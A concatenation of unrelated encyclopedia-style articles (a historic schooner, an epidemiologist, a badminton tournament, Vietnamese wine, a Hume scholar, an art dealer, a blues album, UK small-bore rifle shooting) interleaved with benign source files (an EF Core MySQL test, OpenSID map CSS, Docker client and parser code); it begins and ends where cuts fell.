a sailing schooner. The historic ship ran aground August 3, 2016 in Somes Sound, Mount Desert, Maine during a windjammer regatta. 25 passengers were evacuated with the crew remaining aboard to await high tide to refloat the ship. Description American Eagle is a single-deck two-masted schooner, measuring in length between the perpendiculars, and a total length of . Her beam is , and her hold depth is . She is registered at 70 gross tons and 47 net tons, displacing 118 tons. The frame and planking are oak, the ceiling is fir, and the decking is pine. She currently has a schooner rigging, although she did not for much of her fishing career. The hold has been fitted with fourteen double-occupancy passenger cabins. See also List of schooners List of National Historic Landmarks in Maine National Register of Historic Places listings in Knox County, Maine References External links Schooner American Eagle National Historic Landmarks in Maine Transportation buildings and structures in Knox County, Maine Rockland, Maine Schooners of the United States Tall ships of the United States Windjammers Ships on the National Register of Historic Places in Maine National Register of Historic Places in Knox County, Maine 1930 ships Ships built in Gloucester, Massachusetts
```smalltalk using System; using System.Linq; using Microsoft.EntityFrameworkCore; using Microsoft.EntityFrameworkCore.TestModels.UpdatesModel; using Microsoft.EntityFrameworkCore.TestUtilities; using Microsoft.EntityFrameworkCore.Update; using Pomelo.EntityFrameworkCore.MySql.FunctionalTests.TestUtilities; using Pomelo.EntityFrameworkCore.MySql.Infrastructure; using Pomelo.EntityFrameworkCore.MySql.Tests; using Pomelo.EntityFrameworkCore.MySql.Tests.TestUtilities.Attributes; using Xunit; namespace Pomelo.EntityFrameworkCore.MySql.FunctionalTests { public class UpdatesMySqlTest : UpdatesRelationalTestBase<UpdatesMySqlTest.UpdatesMySqlFixture> { public UpdatesMySqlTest(UpdatesMySqlFixture fixture) : base(fixture) { fixture.TestSqlLoggerFactory.Clear(); } [ConditionalFact] public override void Identifiers_are_generated_correctly() { using (var context = CreateContext()) { var entityType = context.Model.FindEntityType(typeof( your_sha256_hashyour_sha256_hashorrectly)); Assert.Equal("LoginEntityTypeWithAnExtremelyLongAndOverlyConvolutedNameThatIs~", entityType.GetTableName()); Assert.Equal("PK_LoginEntityTypeWithAnExtremelyLongAndOverlyConvolutedNameTha~", entityType.GetKeys().Single().GetName()); Assert.Equal("FK_LoginEntityTypeWithAnExtremelyLongAndOverlyConvolutedNameTha~", entityType.GetForeignKeys().Single().GetConstraintName()); Assert.Equal("IX_LoginEntityTypeWithAnExtremelyLongAndOverlyConvolutedNameTha~", entityType.GetIndexes().Single().GetDatabaseName()); } } [SupportedServerVersionCondition(nameof(ServerVersionSupport.DefaultExpression), nameof(ServerVersionSupport.AlternativeDefaultExpression))] [SupportedServerVersionCondition(nameof(ServerVersionSupport.Returning))] public override void Save_with_shared_foreign_key() { base.Save_with_shared_foreign_key(); } public class UpdatesMySqlFixture : UpdatesRelationalFixture { protected override ITestStoreFactory TestStoreFactory => MySqlTestStoreFactory.Instance; protected override void OnModelCreating(ModelBuilder modelBuilder, DbContext context) { base.OnModelCreating(modelBuilder, context); // Necessary for test `Save_with_shared_foreign_key` to run correctly. if (AppConfig.ServerVersion.Supports.DefaultExpression || AppConfig.ServerVersion.Supports.AlternativeDefaultExpression) { modelBuilder.Entity<ProductBase>() .Property(p => p.Id).HasDefaultValueSql("(UUID())"); } Models.Issue1300.Setup(modelBuilder, context); } public static class Models { public static class Issue1300 { public static void Setup(ModelBuilder modelBuilder, DbContext context) { modelBuilder.Entity<Flavor>( entity => { entity.HasKey(e => new {e.FlavorId, e.DiscoveryDate}); entity.Property(e => e.FlavorId) .ValueGeneratedOnAdd(); entity.Property(e => e.DiscoveryDate) .ValueGeneratedOnAdd(); }); } public class Flavor { public int FlavorId { get; set; } public DateTime DiscoveryDate { get; set; } } } } } } } ```
Jonine Figueroa is an American epidemiologist specializing in breast cancer epidemiology. She is a senior investigator and distinguished scholar in the integrative tumor epidemiology branch at the National Cancer Institute. She was previously a tenured professor and chair of molecular epidemiology and global cancer prevention at the University of Edinburgh. Life Figueroa received a B.S. in genetics and developmental biology from the Pennsylvania State University, a Ph.D. (2004) in molecular genetics and microbiology from Stony Brook University, and an M.P.H. from Columbia University Mailman School of Public Health. Michael J. Hayman was her doctoral advisor. From 2005 to 2008, she completed postdoctoral training in the laboratory of Montserrat García-Closas in the Division of Cancer Epidemiology and Genetics (DCEG) at the National Cancer Institute (NCI) as a cancer prevention fellow. From 2008 to 2015, Figueroa was an investigator in the DCEG. She was a tenured professor and chair of molecular epidemiology and global cancer prevention at the University of Edinburgh, where she is an honorary fellow. In 2023, she returned to the NCI as a senior investigator and NIH distinguished scholar in the integrative tumor epidemiology branch. She researches the interplay of biological, environmental, and socioeconomic determinants in cancer epidemiology studies. Her specialty focus is breast cancer epidemiology. References Living people Year of birth missing (living people) Place of birth missing (living people) Pennsylvania State University alumni Stony Brook University alumni Columbia University Mailman School of Public Health alumni National Institutes of Health people Academics of the University of Edinburgh Cancer epidemiologists American women epidemiologists American epidemiologists 21st-century American women scientists Hispanic and Latino American women scientists
The Carebaco International is an international badminton tournament of the "Caribbean Regional Badminton Confederation" (Carebaco). Until 1999 the tournament was a closed event eligible only for Carebaco members, but to gain BWF World Ranking points since 1999 the Carebaco International tournament became a level 4 open individual event, now part of the BWF Future Series. The tournament established since 1972, when four countries in the Caribbean Region with the fanatical badminton enthusiasts started an annual competition among themselves. These countries were Jamaica, Trinidad & Tobago, Suriname and Guyana. As the years progressed the membership of Carebaco increased to include Aruba, Barbados, Bermuda, the Cayman Islands, Cuba, Curacao, the Dominican Republic, Grenada, Guatemala, Haiti, Panama, Puerto Rico, and Martinique. The Carebaco International is held annually and is part of the Carebaco Games which also include a mixed team event for both seniors and juniors players of Carebaco member and associate member countries. The individual event for juniors is nowadays played in the different age groups comparable to the Pan Am Junior Badminton Championships. Since 2013 there is also an Open Carebaco Junior International U19 part of the Badminton World Federation Future Juniors series eligible for BWF Juniors World Ranking Points. Carebaco Host Venues Carebaco Previous winners Individual Event Carebaco Team Event Results References External links Badminton World Federation Tournament BWF Fansite Jamaica Badminton Association Yang Yang Badminton Badminton Recurring sporting events established in 1972
Vietnamese wine is wine produced in Vietnam. The area was first cultivated for viticulture during the French colonial rule of the region in the late 19th century. The region's tropical climate was ill-suited for the type of Vitis vinifera that the French colonists were used to and the wine industry turned its attention to fruit wine production. The late 20th century saw a renewed focus on the development of Vitis vinifera with the assistance of flying winemakers from regions like Australia. In 1995, a joint venture with Australian winemakers started an aggressive planting scheme to reintroduce international grape varieties like Cabernet Sauvignon and Chardonnay to land that was until recently littered with landmines left over from the Vietnam War. Viticulture and geography Vietnam is located between the Tropic of Cancer and the Equator and has a climate typical of a tropical region marked by high humidity and a rainy summer season. The topography of Vietnam is very hilly which can provide some relief from the tropical influences and also create various microclimates where viticulture could thrive. The Gulf of Tonkin, Mekong and Red Rivers also have a tempering effect on the climate. Due to the year round warmth, vineyards in the southern region of Vietnam can produce a harvest up to three times during the course of a calendar year. Some plant varieties can produce fruit from new cuttings within a year of their planting. French colonists planted their vineyards in the highlands areas around the Ba Vì mountain range near Hanoi. Modern viticultural techniques have produced some successful results with aggressive pruning and the adoption of the pergolas style of trellising. This Pergolas trellis has the benefit of keeping the grapevines off the ground to where some of the humidity is ventilated which reduces the risk of powdery mildews developing. The grape bunches are shaded by the canopy of the vine which reduces the yields. Other areas with vineyard plantings include the Central Highland region along the Annamite Range and the southern coastal plain of the Ninh Thuận around Phan Rang – Tháp Chàm where Vietnam's first commercial winery Thien Thai Winery is located. Grapes and wines As of 2005, the main grape varieties planted in Vietnam are the Cardinal and Chambourcin grapes. A large form of wine production is from fruit wines made from the country's abundance of local fruits. The British firm Allied Domecq and Australian winemakers were working on introducing more international grape varieties into the region as well as experimenting with sparkling wine production. Many new vineyards sites are being planted in areas recently demined. See also Japanese wine Winemaking Agriculture in Vietnam Wine in China Rượu đế Rượu thuốc Rượu nếp Cơm rượu References Wine Wine by country Vietnamese drinks Agriculture in Vietnam Vietnamese cuisine
Elizabeth S. Radcliffe is Professor of philosophy at William & Mary. She is the author of Hume, Passion, and Action, which discusses David Hume's views on passion's role in driving our actions and constituting our moral judgments. Simon Blackburn calls it "a beautifully judged, balanced, and therefore especially valuable addition to the literature." Radcliffe is editor of A Companion to Hume, and co-editor of Late Modern Philosophy: Essential Readings with Commentary. She was co-editor of the journal Hume Studies, with Kenneth Winkler, from 2000 to 2005, and president of the Hume Society from 2010 to 2012. Before coming to William & Mary, Radcliffe was Professor of Philosophy at Santa Clara University. She has chaired each department. She received her MA and PhD from Cornell University in 1990. She has received two NEH Research Fellowships and an NEH Summer Stipend. References Living people College of William & Mary faculty Santa Clara University faculty American philosophy academics Cornell University alumni Hume scholars Year of birth missing (living people)
Yarpuz is a neighbourhood in the municipality and district of Akseki, Antalya Province, Turkey. Its population is 234 (2022). Before the 2013 reorganisation, it was a town (belde). References Neighbourhoods in Akseki District
```css /** * File ini: * * CSS untuk modul Pemetaan * * /assets/css/peta.css * */ /** * * File ini bagian dari: * * OpenSID * * Sistem informasi desa sumber terbuka untuk memajukan desa * * Aplikasi dan source code ini dirilis berdasarkan lisensi GPL V3 * * Hak Cipta 2009 - 2015 Combine Resource Institution (path_to_url * Hak Cipta 2016 - 2020 Perkumpulan Desa Digital Terbuka (path_to_url * * Dengan ini diberikan izin, secara gratis, kepada siapa pun yang mendapatkan salinan * dari perangkat lunak ini dan file dokumentasi terkait ("Aplikasi Ini"), untuk diperlakukan * tanpa batasan, termasuk hak untuk menggunakan, menyalin, mengubah dan/atau mendistribusikan, * asal tunduk pada syarat berikut: * Pemberitahuan hak cipta di atas dan pemberitahuan izin ini harus disertakan dalam * setiap salinan atau bagian penting Aplikasi Ini. Barang siapa yang menghapus atau menghilangkan * pemberitahuan ini melanggar ketentuan lisensi Aplikasi Ini. * PERANGKAT LUNAK INI DISEDIAKAN "SEBAGAIMANA ADANYA", TANPA JAMINAN APA PUN, BAIK TERSURAT MAUPUN * TERSIRAT. PENULIS ATAU PEMEGANG HAK CIPTA SAMA SEKALI TIDAK BERTANGGUNG JAWAB ATAS KLAIM, KERUSAKAN ATAU * KEWAJIBAN APAPUN ATAS PENGGUNAAN ATAU LAINNYA TERKAIT APLIKASI INI. * * @package OpenSID * @author Tim Pengembang OpenDesa * @copyright Hak Cipta 2009 - 2015 Combine Resource Institution (path_to_url * @copyright Hak Cipta 2016 - 2020 Perkumpulan Desa Digital Terbuka (path_to_url * @license path_to_url GPL V3 * @link path_to_url */ #map { /* Agar button yang ada di peta selalu di belakang sidebar */ z-index: 800; width:100%; height: 85vh; } #content { height: auto !important; width: auto !important; } #bodyContent p { margin: 10px 0; } .form-group a { color: #FEFFFF; } .foto { width:200px; height:140px; border-radius:3px; -moz-border-radius:3px; -webkit-border-radius:3px; border:2px solid #555555; } .icos { padding-top: 9px; } .foto_pend { width: auto; max-width: 45px; border-radius: 3px; -moz-border-radius: 3px; -webkit-border-radius: 3px; } .leaflet-popup-content { height: 245px; overflow-y: scroll; } .kantor_desa .leaflet-popup-content { height: auto; overflow-y: auto; } .covid_pop .leaflet-popup-content { height: auto; overflow-y: auto; } .leaflet-tooltip-content p { margin: 18px 0 !important; } .leaflet-tooltip { /*height: 245px;*/ } .leaflet-control-layers { display: block; position: relative; } .leaflet-control-locate a{font-size:2em;color:#444;cursor:pointer} .leaflet-control-locate.active a{color:#2074b6} .leaflet-control-locate.active.following a{color:#fc8428} .leaflet-control-locate-location circle{animation:leaflet-control-locate-throb 4s ease infinite}@keyframes leaflet-control-locate-throb{0%{stroke-width:1}50%{stroke-width:3;transform:scale(0.8, 0.8)}100%{stroke-width:1}} .btn-social { position: relative; padding-left: 44px; text-align: left; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; } .btn-social.btn-sm { padding-left: 38px; } .bg-navy { background-color: #001f3f !important; color: #fff !important; } .square { position: relative; height: 70px; width: 100%; border-radius: 10px; color: #efefef; font-family: 'montserrat', sans-serif; font-weight: bold; display: flex; flex-direction: column; align-items: flex-start; justify-content: center; padding: 3px 15px; overflow: hidden; margin-left: 230px; } .covid { height: 70px; z-index: 10; } .covid span:nth-child(1) { font-size: small; font-weight: normal; } .covid span:nth-child(2) { font-size: medium; } .positif { background: #F82649; } .sembuh { background: #09AD95; } .meninggal { background: #D43F8D; } .line { position: relative; height: 17px; width: auto; border-radius: 5px; margin-left: 230px; font-size: 14px; } .line-short { width: auto; } .covid::before { content: ''; position: absolute; background-image: url('../images/corona.png'); background-position: right bottom; background-repeat: no-repeat; background-size: contain; width: 100%; height: 100%; opacity: 0.2; } .covid.shimmer::before { content: ''; background-image: none; } .shimmer { background: #efefef; background-image: linear-gradient(to right, #efefef 0%, #edeef1 20%, #f6f7f8 40%, #efefef 100%); background-repeat: no-repeat; background-size: cover; animation-duration: 1s; animation-fill-mode: forwards; animation-iteration-count: infinite; animation-name: placeholderShimmer; animation-timing-function: linear; } .grid-print-container { grid-template: auto 1fr auto / 1fr; background-color: white; } .grid-map-print { grid-row: 2; } .grid-print-container > .title, .grid-print-container > .sub-content { color: black; } .title { grid-row: 1; justify-self: center; text-align: center; color: grey; box-sizing: border-box; margin-top: 0; } .sub-content { grid-row: 5; padding-left: 10px; text-align: center; color: grey; box-sizing: border-box; } [leaflet-browser-print-pages] { display: none; } .pages-print-container [leaflet-browser-print-pages] { display: block; } .info.legend { padding: 6px 8px; font: 10px/12px Arial, Helvetica, sans-serif; font-weight: bold; background: rgba(255,255,255,0.8); box-shadow: 0 0 15px rgba(0,0,0,0.2); border-radius: 5px; max-height: 250px; overflow: auto; } .info h4 { margin: 0 0 5px; color: #777; } .legend { text-align: left; line-height: 10px; color: #555; } .legend > * { display: flex; margin-bottom: 5px; } .legend i { width: 10px; height: 10px; float: left; margin-right: 8px; opacity: 1; } .leaflet-tooltip-pane .text { color: #000000; font-weight: bold; background: transparent; border:0; box-shadow: none; font-size:0.8em; } @keyframes placeholderShimmer { 0% { background-position: -468px 0; } 100% { background-position: 468px 0; } } #covid_local_peta { margin-right: 10px; margin-left: 10px; } #covid_local_peta .panel { background-color: inherit; margin-bottom: 0px; } #covid_local_peta .panel-body { background-color: white; } #covid_local_peta .panel-body-lg { background-color: none; } #covid_local_peta .panel-body.sub { background-color: inherit; padding-top: 10px; } #covid_local_peta .row .panel-heading { height: 50px; padding: 1px; } #html_a .leaflet-popup-content { height: 100px; overflow-y: scroll; } #qrcode .panel-body-lg { margin-left: 5px; margin-bottom: 40px; pointer-events: visiblePainted; pointer-events: auto; position: relative; z-index: 800; } .info-box { display: block; min-height: 90px; background: #fff; width: 100%; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.1); border-radius: 2px; margin-bottom: 15px; } .info-box small { font-size: 14px; } .info-box .progress { background: rgba(0, 0, 0, 0.2); margin: 5px -10px 5px -10px; height: 2px; } .info-box .progress, .info-box .progress .progress-bar { border-radius: 0; } .info-box .progress .progress-bar { background: #fff; } .info-box-icon { border-top-left-radius: 2px; border-top-right-radius: 0; border-bottom-right-radius: 0; border-bottom-left-radius: 2px; display: block; float: left; height: 90px; width: 90px; text-align: center; font-size: 45px; line-height: 90px; background: rgba(0, 0, 0, 0.2); } .info-box-icon > img { max-width: 100%; } .info-box-content { padding: 5px 10px; margin-left: 90px; } .info-box-number { display: block; font-weight: bold; font-size: 18px; } .progress-description, .info-box-text { display: block; font-size: 14px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; } .info-box-text { text-transform: uppercase; } .info-box-more { display: block; } .progress-description { margin: 0; } .bg-red, .bg-yellow, .bg-blue, .bg-green, .bg-red-active, .bg-yellow-active, .bg-blue-active, .bg-green-active { color: #fff !important; } .bg-red { background-color: #dd4b39 !important; } .bg-yellow { background-color: #f39c12 !important; } .bg-blue { background-color: #0073b7 !important; } .bg-green { background-color: #00a65a !important; } @media print { footer { display: none !important; } } .card-body { -ms-flex: 1 1 auto; flex: 1 1 auto; margin: 0; padding: 5px; position: relative; } /* firstHeading text center dan bold*/ .firstHeading { text-align: center; font-weight: bold; } ```
James Birch is an English art dealer, curator and gallery owner. He is best known for his innovative championing of British art, in particular for exhibiting Francis Bacon in Moscow, in the then USSR, in 1988, and Gilbert & George in Moscow in 1990, and in Beijing and Shanghai in 1993. Life and career Birch was born in London in . His parents were artists, and he had a brother and sister, both older than him. He was educated at the University of Aix-en-Provence, where he studied Art History, before training in the Old Master department of Christie's Fine Art in London where he later established the 1950s Rock & Roll department. In 1983 he opened his first gallery, James Birch Fine Art, on the King's Road, London, where he specialised in the work of British surrealists such as John Banting, Eileen Agar, Conroy Maddox and Grace Pailthorpe, the Symbolist and magician Austin Osman Spare and the artist and muse Luciana Martinez de la Rosa. In 1984 Birch gave the Turner Prize winner Grayson Perry his first show, with a second quickly following in 1985. Perry was a founding member of the Neo-Naturist cabaret with Jennifer Binnie, who Birch had previously exhibited. In 1986 Birch was photographed by Jane England, who included his portrait in her book on 1970s and 1980s subculture in London, Turn and Face the Strange. James Birch Fine Art closed in 1986 and in 1987 Birch opened Birch and Conran Fine Art in Soho, London in association with Paul Conran. Birch then concentrated on exhibiting Gilbert & George in Moscow in 1990 and Beijing in 1993. The broadcaster and author Daniel Farson wrote the book With Gilbert & George in Moscow (Bloomsbury, 1991) about the Moscow exhibition. Farson also recounted the Francis Bacon (artist) exhibition in Moscow in his biography of Bacon, The Gilded Gutter Life of Francis Bacon (Pantheon, 1993). In 1997 Birch returned to exhibiting in London when he opened the A22 Gallery in Clerkenwell, where he showed Keith Coventry, the photographer Dick Jewell, Breyer P-Orridge and two exhibitions by members of The Colony Room. In an article titled 'The Pimpernel Curator', the July 2011 issue of f22 magazine credited Birch with having created some of the 'most imaginative exhibitions of the last twenty years'. Away from curating, in 2010 Dewi Lewis published Birch's Babylon: Surreal Babies. The book presented Birch's collection of bizarre postcards of babies that were produced in the early 20th century and included a foreword by George Melly In 2017 Birch collaborated with the author and counterculture writer Barry Miles to produce a book and exhibition charting the history of the British underground press of the 1960s entitled The British Underground Press of the Sixties. The exhibition was held at Birch's own A22 Gallery in Clerkenwell, London. Birch regularly lends art works to art institutions and galleries for major and small scale exhibitions. Some of the recent ones include; Grayson Perry: The Pre-Therapy Years at The Holburne Museum Bath (24 January - 25 May 2020) , Modern Couples Art, Intimacy and the Avant-garde at Barbican Art Gallery (10 Oct 2018—27 Jan 2019), A Tale of Mother’s Bones: Grace Pailthorpe, Reuben Mednikoff and the Birth of Psychorealism a travelling show presented at the De La Warr Pavilion, (6 October 2018 – 20 January 2019), the Camden Arts Centre, (12 April – 23 June 2019) and the Newlyn Art Gallery & The Exchange (19 October 2019 - 4 January 2020), Dear Christine at Vane, Newcastle, (1-29 June 2019) ArthouseSE1, London, (2-29 February 2020) Birch's book Bacon in Moscow was published in January 2021 by Cheerio Publishing. It is a memoir of his instigating Francis Bacon's exhibition in Moscow in 1988. Grayson Perry described it as "[a] rollicking cultural adventure. Fascinating and true." It received positive reviews in The Times, The Guardian, The Art Newspaper, The Spectator, and was The Observer's book of the week, Hatchards' February non-fiction book of the month, and The Guardian's audio book of the week. Notable exhibitions "Them" at the Redfern Gallery, January 2020, London The British Underground Press of the Sixties with Barry Miles, A22 Gallery, 2018, London Gilbert and George (Beijing and Shanghai Museums, People's Republic of China, 1993) Christine Keeler: My Life in Pictures (The Mayor Gallery, London 2010) Elena Khudiakova: In Memoriam (Dadiani Fine Art, 2015) References External links Official Website Living people Art dealers from London British curators Year of birth missing (living people)
The Complete Blind Willie Johnson is a compilation album of all the known recordings by American gospel blues singer-guitarist Blind Willie Johnson. As part of the Roots N' Blues series, it was released jointly by Columbia Records and Legacy Recordings, on April 27, 1993. All of the tracks on the two-compact disc set were originally issued by Columbia on the then-standard two-sided 78 rpm record format. Over the years, many of the songs were included on other compilations, such as Blind Willie Johnson – His Story (1957) and Praise God, I'm Satisfied (1977); however, this album marks the first time all of Johnson's recordings were compiled on one set. In 2013, Columbia reissued the album as The Essential Blind Willie Johnson. Background The tracks on the album originate from five recording dates between December 3, 1927, and April 20, 1930. Johnson, who provided lead vocals and guitar accompiment, was sometimes backed by female vocalists, most commonly his first alleged wife Willis B. Harris. Blues historian Samuel Charters provided the information in album's liner booklet, correcting some bigrophahical errors he made from his first project featuring Johnson's recordings, titled Blind Willie Johnson 1927–1930. Track listing See List of songs recorded by Blind Willie Johnson for sessionography information. Disc one "I Know His Blood Can Make Me Whole" – 3:03 "Jesus Make Up My Dying Bed" – 3:12 "It's Nobody's Fault but Mine" – 3:09 "Mother's Children Have a Hard Time" – 3:21 "Dark Was the Night, Cold Was the Ground" – 3:20 "If I Had My Way I'd Tear the Building Down" – 3:08 "I'm Gonna Run to the City of Refuge" – 3:23 "Jesus Is Coming Soon" – 3:11 "Lord I Just Can't Keep From Crying" – 3:01 "Keep Your Lamp Trimmed and Burning" – 3:03 "Let Your Light Shine on Me" – 3:09 "God Don't Never Change" – 2:57 "Bye and Bye I'm Goin' to See the King" – 2:52 "Sweeter as the Years Roll By" – 2:46 Disc two "You'll Need Somebody on Your Bond" – 3:05 "When the War Was On" – 3:02 "Praise God I'm Satisfied" – 3:11 "Take Your Burden to the Lord and Leave It There" – 2:56 "Take Your Stand" – 3:01 "God Moves on the Water" – 2:59 "Can't Nobody Hide from God" – 3:21 "If It Had Not Been For Jesus" – 3:23 "Go with Me to That Land" – 3:04 "The Rain Don't Fall on Me" – 3:18 "Trouble Will Soon Be Over" – 3:07 "The Soul of a Man" – 3:13 "Everybody Ought to Treat a Stranger Right" – 3:05 "Church, I'm Fully Saved To-Day" – 3:07 "John the Revelator" – 3:17 "You're Gonna Need Somebody on Your Bond" – 3:10 References 1993 compilation albums Blues compilation albums Columbia Records compilation albums Blind Willie Johnson albums
```smalltalk using System.Text; using Ductus.FluentDocker.Model.Containers; using Newtonsoft.Json; namespace Ductus.FluentDocker.Executors.Parsers { public sealed class ClientImageInspectCommandResponder : IProcessResponseParser<ImageConfig> { public CommandResponse<ImageConfig> Response { get; private set; } public IProcessResponse<ImageConfig> Process(ProcessExecutionResult response) { if (string.IsNullOrEmpty(response.StdOut)) { Response = response.ToResponse(false, "Empty response", new ImageConfig()); return this; } if (response.ExitCode != 0) { Response = response.ToErrorResponse(new ImageConfig()); return this; } var arr = response.StdOutAsArray; var sb = new StringBuilder(); for (var i = 1; i < arr.Length - 1; i++) { sb.AppendLine(arr[i]); } var container = sb.ToString(); Response = response.ToResponse(true, string.Empty, JsonConvert.DeserializeObject<ImageConfig>(container)); return this; } } } ```
Marchevo is a village in Boychinovtsi Municipality, Montana Province, north-western Bulgaria. References Villages in Montana Province
```go package client // import "github.com/docker/docker/client" import ( "context" "github.com/docker/docker/api/types/checkpoint" ) // CheckpointCreate creates a checkpoint from the given container with the given name func (cli *Client) CheckpointCreate(ctx context.Context, container string, options checkpoint.CreateOptions) error { resp, err := cli.post(ctx, "/containers/"+container+"/checkpoints", nil, options, nil) ensureReaderClosed(resp) return err } ```
The National Small-bore Rifle Association (NSRA), is the national governing body for all small-bore rifle and pistol target shooting in the United Kingdom, including airgun and match crossbow shooting. The NSRA is based at the Lord Roberts Centre, within the grounds of the National Shooting Centre at Bisley in Surrey. National postal competitions are organised all year round, together with a series of meetings, culminating in the Bisley Rifle Meeting, or National Meeting in August, preceded by the Scottish Rifle Meeting in June/July. History Formation The NSRA was originally formed in 1901 as the Society of Working Mens Rifle Clubs. A series of heavy defeats during 1899 in the Second Boer War had demonstrated a lack of marksmanship ability amongst British military-age men, whilst the Boers had been able to pick off British officers at ranges in excess of 1,000yards. Although the National Rifle Association had been founded in 1859, ranges suitable for large-calibre service rifles were necessarily rural and costly to travel to. Cost of ammunition for civilians was also a limitation. With the adoption of the sub-calibre Morris aiming tube in 1883 and development of the .22 Long Rifle cartridge in 1887 it became apparent that principles of marksmanship could be taught and trained using these small calibre "miniature" rifles on local or even indoor ranges located in towns and cities. Major General Charles Edward Luard was at the forefront of this line of thinking and pressured the British Government to sponsor such a movement from 1899 until 23 March 1901 when a meeting of MPs, city Mayors and dignitaries representing many Working Men's Clubs, passed a resolution founding the Society. The organisation was founded on the premise of being funded primarily by gentlemen, with the working classes expected to join the clubs and avail themselves of this opportunity. In many ways this was a spiritual update on the ancient English law requiring all men and boys to practice archery, facilitated by the local clergy and gentry. Notable champions of this movement included Arthur Conan-Doyle, who constructed a 100yard range at his Undershaw home and founded a rifle club there, providing shooting for local men. As a champion of such clubs, Conan-Doyle sat on the Rifle Clubs Committee of the National Rifle Association. Many modern rifle clubs still benefit from this legacy, having inherited the grounds and quarries that land owners made available to these new Miniature Rifle Clubs. Luard took the Chair of the SWMRC's Executive Committee, with Earl Roberts of Kandahar acting as President and affording the group enormous publicity through his celebrity status as a celebrated Field Marshal. The 15th Duke of Norfolk was appointed as Chair of the non-executive Council. In 1902 with around 80 affiliated clubs, the Society of Working Mens Rifle Clubs entered into co-operation with The British Rifle League - an organisation with similar aims operated by popular magazine "The Regiment". In collaboration they held their first shooting match and the first "Miniature Bisley" was held at The Crystal Palace in March 1903. This was considered a small-bore version of the NRA's Imperial Meeting - by then moved from Wimbledon Common to Bisley Camp in Surrey. The two organisations merged later in 1903 becoming the Society of Miniature Rifle Clubs (SMRC), a name it held until 1947 when it renamed itself the National Small-bore Rifle Association (NSRA). In 1904 Earl Roberts retired from active military service and devoted himself to the newly merged SMRC, driving a major fundraising campaign and seeking to found a club in every town. In 1906 he successfully gained recognition from the Army Council, putting the SMRC on an equal footing with the NRA and exempting members of affiliated clubs from the Gun Licence Duty, which was the considerable sum of 10 Shillings. The exemption from this cost enabled a new wave of clubs, resulting in the training of tens of thousands of men by the outbreak of the First World War. The First World War saw a downturn in fortunes for the SMRC. In 1914, Earl Roberts died aged 82, having developed pneumonia whilst visiting troops in France. The Presidency remained vacant until 1917 when Field Marshal Earl Haig was appointed as President. By the end of the war the number of affiliated clubs had fallen dramatically to around 1,500 as many club members had either lost their lives or were no longer inclined to shoot after the horrors of the trenches. The Firearms Act 1920 - enacted in fear of growing socialism and the shadow of the Russian Revolution - further constrained the ability of clubs to operate. The Earl Roberts Memorial Challenge Cup was first awarded in 1923 to the British Prone Champion, the annual competition for which was held at the Association's National Smallbore Rifle Meeting at Bisley. World War 2 The Society worked to reverse this trend, upsizing through several London bases and having 2374 affiliated clubs by 1939. The Second World War saw a growth in clubs. Just as many original clubs from 1902 had grown from volunteer militia groups, so new clubs formed around the Home Guard Units in areas where no clubs existed already. SMRC affiliations grew to 4019 clubs by the end of 1945. The War Office continued to support these clubs despite having stood down the Home Guard in 1944. The war also saw the Society move after their London Headquarters was destroyed in May 1941, resulting in the loss of the Society's records as well as the destruction of 48 valuable trophies. Their printers were also hit that night, destroying their stock of targets, as were the offices of the Society's solicitors and auditors. Nonetheless, they were fully operational just three months later from new headquarters in the relative safety of Richmond, Surrey. Post-War During the Second World War, the Society suspended all airgun events to focus solely on cartridge shooting. Post-war the Association showed little interest in redeveloping it. This gap was filled by the emergence of the Air Rifle Clubs Association (ARCA) in the 1960s. This led to a split where the NSRA was the recognised authority for international small-bore and airgun shooting despite ARCA being the de facto domestic authority on airgun shooting. This changed with the recognition of ARCA by the Central Council for Physical Recreation following an intervention by CCPR chairman the Duke of Edinburgh. CCPR recognition led to a rebrand from ARCA to the National Air Rifle and Pistol Association (NARPA). NARPA organised a National Airgun Championship, initially at Rushden, Northamptonshire, and later at RAF Cosford in Shropshire. Under pressure from this new organisation the NSRA launched their own British Air Gun Championships in 1974 with the inaugural meeting held at the National Sports Centre for Wales, in Sophia Gardens, Cardiff, and remaining there until 1990 when it was held in Manchester ahead of the 1991 European Air Gun Championships which were held in the same Manchester venue. In 1980 NARPA closed, with the NSRA absorbing their responsibilities. Over the decades, various attempts were made to establish a National Range for the hosting of Small-bore Meetings. In 1977 a demountable range was developed that could be erected annually on Bisley's Century Range, and the Society (now renamed the NSRA) made the decision to leave London for the last time, setting up base in 1980 on Bisley Camp which was rapidly being developed as a National Shooting Centre. In 1991, the purpose-built National Indoor Shooting Centre was opened at Aldersley Leisure Village near Wolverhampton. The centre was located adjacent to a 100yard small-bore range operated by Wolverhampton Smallbore Rifle Association and hosted local clubs but also provided a more central location for the British Air Gun Championships, which were held there between 1992 and 2001, moving to Bisley in 2002 following the opening of the Lord Roberts Centre. Opening in 2001, the LRC was a state-of-the-art small-bore and airgun range complex constructed for the 2002 Commonwealth Games, featuring an Olympic-grade Sius Ascor electronic scoring system and office space for the NSRA. The NSRA offices moved from "Lord Roberts House", a building just inside the entrance to Bisley Camp. This office was sold to the Clay Pigeon Shooting Association, who moved to the camp from leased premises in Corby and renamed the building "Edmonton House". In 2006, the NSRA founded the National Association of Target Shooting Sports working group in association with the National Rifle Association and Clay Pigeon Shooting Association, to explore the practicalities and benefits of a merger between the bodies. The project was shelved in July 2009 following the withdrawal of the CPSA, followed by the NRA. Construction of the Lord Roberts Centre The Lord Roberts Centre was a controversial building from its inception. Oriented North-East rather than due North, early morning shooters on the outdoor ranges were blinded by the sun rising over the targets. This was compounded by the decision not to include cross-range baffles, which are a common feature on similar range complexes in Europe. The first floor - where the airgun range was located - was criticised for using a sprung construction which produced noticeable bounce on the firing point. Despite this, Niccolò Campriani scored a 599 and a perfect 600 score at the British Airgun Championships in 2013. Most notable however was the financial strain that this large facility placed on the NSRA, which had no organisational experience operating a dedicated range complex. With the prohibition on both centrefire and small-bore pistols in 1997, visitor numbers from air gun and rifle shooters to the centre were insufficient to cover the operating costs, resulting in the Association's commercial subsidiary seeking other sources of income, including wedding receptions and a long-term deal that saw the upstairs hall configured as a roller-hockey rink. International Competition Selection for ISSF smallbore competitions such as the World Championships is now managed by British Shooting. The NSRA continues to compete in a number of historic rifle matches, predominantly against the United States and Commonwealth nations such as Canada and South Africa. These are marked from the ISSF events by mostly being fired at both 50metres and 100yards. International Post Match ("The Dewar Match") Sir Thomas Dewar presented the International Post Match Trophy to the NSRA in 1909 for an annual team match to be conducted by post. This allowed an annual match to take place without the 